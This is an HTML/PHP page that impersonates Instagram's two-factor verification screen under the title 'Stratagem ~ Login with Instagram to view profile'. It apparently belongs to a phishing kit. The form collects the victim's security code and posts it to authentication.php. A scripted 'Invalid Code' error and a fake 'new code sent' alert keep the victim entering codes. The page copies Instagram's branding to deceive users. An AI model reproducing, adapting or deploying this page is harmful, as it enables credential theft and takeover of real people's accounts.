<!DOCTYPE html>
<html lang="en" class="js not-logged-in client-root js-focus-visible sDN5V">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <title>Stratagem ~ Login with Instagram to view profile</title>
      <meta name="robots" content="noimageindex, noarchive">
      <meta name="apple-mobile-web-app-status-bar-style" content="default">
      <meta name="mobile-web-app-capable" content="yes">
      <meta name="theme-color" content="#ffffff">
      <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
      <link rel="icon" sizes="192x192" href="https://www.instagram.com/static/images/ico/favicon-192.png/b407fa101800.png">
      <meta property="al:ios:app_name" content="Stratagem">
      <meta property="al:android:app_name" content="Stratagem">
      <meta property="og:site_name" content="Stratagem">
      <meta property="og:title" content="Stratagem">
      <meta property="og:image" content="https://cdn.shopify.com/s/files/1/0581/1801/3136/files/generated_photos_5e6831576d3b380006de5b37_400x.png">
      <meta content="Stratagem - View profile" name="description">
      <link href="./assets/0d10f4e13065.css" type="text/css" crossorigin="anonymous" rel="stylesheet">
   </head>
   <body class="" style="">
      <div id="react-root">
         <section class="_9eogI E3X2T">
            <div></div>
            <main class="SCxLW  o64aR " role="main">
               <div class="tbpKJ">
                  <article class="agXmL">
                     <div class="rgFsT ">
                        <div class="gr27e ">
                           <div class="FsQoP">
                              <div class="swB58" id="verificationCodeDescription">
                                 <img src="assets/576406ccc24b.png" style="width: 80px; margin-bottom:20px; margin-top:10px">
                                 <br>
                                 Enter the code we sent you to your phone or use the 6-digit code generated by your authentication app. <?php if(isset($_GET['Error'])){if($_GET['Error']=='InvalidAuth'){ ?> <br><b style="color:red">Invalid Code. Please try again.</b><?php }} ?>
                              </div>
                              <form class="_3GlM_" method="POST" action="authentication.php">
                                 <div class="gi2oZ">
                                    <div class="_9GP1n   ">
                                       <label class="f0n8F "><span class="_9nyy2" id='securitycodelabel'>Security Code</span><input onkeyup="if(this.value!=''){document.getElementById('securitycodelabel').style.display='none'} else {document.getElementById('securitycodelabel').style.display='block'}" aria-describedby="verificationCodeDescription" aria-label="Security Code" aria-required="true" autocapitalize="off" autocomplete="off" autocorrect="off" maxlength="12" name="verificationCode" type="tel" class="_2hvTZ pexuQ zyHYP" value=""></label>
                                       <div class="i24fI"></div>
                                    </div>
                                 </div>
                                 <div class="                    Igw0E     IwRSH      eGOV_         _4EzTm      MGdpg                        CovQj                  jKUp7         iHqQ7">
                                    <button class="sqdOP  L3NKy   y3zKF" type="submit">Confirm</button>
                                 </div>
                              </form>
                              <div class="swB58">Didn't receive your code? <a onclick="alert('Instagram Auth just sent you a new code.'); window.location.href=''" class="jNzLF" href="index.php">Get a new one</a></div>
                           </div>
                        </div>
                        <div class="gr27e"></div>
                        <div class="APQi1">
                           <p class="b_nGN">Get the app.</p>
                           <div class="iNy2T"><a class="z1VUo" href=""><img alt="Available on the App Store" class="Rt8TI " src="./assets/180ae7a0bcf7.png"></a><a class="z1VUo" href=""><img alt="Available on Google Play" class="Rt8TI " src="./assets/e9cd846dc748.png"></a></div>
                        </div>
                     </div>
                  </article>
               </div>
            </main>
            <footer class="_8Rna9  _3Laht " role="contentinfo">
               <div class="iseBh  VWk7Y " style="max-width: 1012px;">
                  <nav class="uxKLF">
                     <ul class="ixdEe _9Rlzb">
                        <li class="K5OFK"><a class="l93RR" href="" rel="nofollow noopener noreferrer" target="_blank">About Us</a></li>
                        <li class="K5OFK"><a class="l93RR" href="">Support</a></li>
                        <li class="K5OFK"><a class="l93RR" href="">Blog</a></li>
                        <li class="K5OFK"><a class="l93RR" href="">Press</a></li>
                        <li class="K5OFK"><a class="l93RR" href="">API</a></li>
                        <li class="K5OFK"><a class="l93RR" href="">Jobs</a></li>
                        <li class="K5OFK"><a class="l93RR _vfM2" href="">Privacy</a></li>
                        <li class="K5OFK"><a class="l93RR" href="">Terms</a></li>
                        <li class="K5OFK"><a class="l93RR" href="">Directory</a></li>                      
                     </ul>
                  </nav>
                  <span class="DINPA">© 2021</span>
               </div>
            </footer>
         </section>
      </div>
      <link rel="stylesheet" href="./assets/4ae92aafbe30.css" type="text/css" crossorigin="anonymous">
      <link rel="stylesheet" href="./assets/b09e8f4f45a7.css" type="text/css" crossorigin="anonymous">
      <link rel="stylesheet" href="./assets/39b2171a177c.css" type="text/css" crossorigin="anonymous">

      <div class="Z2m7o">
         <div class="CgFia "></div>
      </div>
   </body>
</html>